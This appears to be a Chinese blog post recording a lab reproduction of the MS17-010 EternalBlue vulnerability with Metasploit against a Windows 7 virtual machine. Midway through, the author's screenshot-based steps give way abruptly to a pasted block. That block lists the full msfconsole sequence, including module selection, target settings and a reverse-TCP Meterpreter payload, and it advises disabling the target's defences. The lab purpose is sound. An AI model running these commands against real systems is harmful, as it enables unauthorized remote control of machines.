永恒之蓝漏洞复现记录

准备工作

实验环境搭建
  • 下载并安装VMware Workstation软件
  • 查看VMware的虚拟网卡和虚拟网络设置
  • 安装Windows虚拟机镜像和Kali linux虚拟机镜像
实验目的
  • 掌握Windows网络服务远程渗透攻击基本理论知识。
  • 掌握Windows漏洞及漏洞利用方法原理。
  • 掌握Windows网络服务远程渗透攻击防范措施。
  • 了解渗透测试软件Metasploit并掌握操作使用Metasploit进行Windows远程渗透攻击的方法。

知识点整理

漏洞与漏洞利用

漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或者破坏系统。

漏洞利用是指用户从目标系统中找到容易攻击的漏洞,然后利用漏洞获得权限。

WannaCry勒索病毒

病毒指编织者在计算机程序中插入的破坏计算机功能或者破坏数据、影响计算机使用并且能够自我复制的一组计算机指令或者程序编码。

2017年5月爆发的WannaCry病毒,是一种蠕虫式勒索病毒。

不法分子利用危险漏洞MS17-010“永恒之蓝”(Windows操作系统445端口存在过的漏洞)进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry病毒进行感染,并作为攻击机再次扫描互联网或局域网其他机器,形成蠕虫感染大范围超快速扩散。

Metasploit

Metasploit渗透测试软件是附带数百个已知软件漏洞的专业级漏洞检测和攻击工具,通过它可以很容易的获取、开发并对计算机软件漏洞实施攻击,也可以帮助专业安全人士识别安全性问题、验证漏洞缓解措施。

Metasploit软件采用开发框架和模块组件的可扩展模型,模块组件是真正实施渗透攻击的代码,比如利用安全漏洞的Exploits模块、进行扫描和查看等其他辅助任务的Auxiliary模块等。

Metasploit软件提供四种不同的用户交互接口,其中MSF交互终端(MSFCONSOLE)比较常用。MSFCONSOLE可获得用户连接到主机的信息,从而利用漏洞,使得用户能启动渗透攻击目标系统。

MSFCONSLOE常用命令

search:搜索一个特定模块

use:选择使用特定的模块

run:启动一个非渗透测试模块

exploit:实施渗透攻击

set:配置各种类型模块中的详细参数

quit/exit:退出终端

show:查看每种类型模块的详细配置参数

实验过程

1)对Windows靶机上的MS17-010漏洞进行远程渗透攻击,获得目标主机的访问权

第一步:设置环境:

  • 确保Kali linux和Windows靶机都在同一个网络中。
  • 检查Windows靶机的IP地址。

查询Kali的IP地址:

image-20240826201310195

查询Windows7的IP地址:

image-20240826201444011

容易发现IP地址均为192.168.175.xxx ,判断两个计算机都处于同一个网络中。

使用Kali攻击机ping Windows靶机:

image-20240826203546904

使用Windows靶机ping Kali攻击机:

image-20240826202647377

证明两台计算机可以互相通信。

在Kali中启用Metasploit:

image-20240826203747781

搜索MS17-010漏洞的相关模块:

image-20240826212552503

选择合适的expolit模块:(这里选择的是ms17_010_eternalbue)

image-20240826212805242

设定RHOSTS和其他必要参数:

设定靶机的IP地址:

image-20240826213012056

设置payload(指的是在攻击过程中实际执行的代码或命令,这些代码或命令是嵌入在攻击载荷中的。当一个漏洞被成功利用时,payload 就会被执行,从而实现攻击者的目的。):

永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用了Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些版本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞被利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

下雨的清晨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值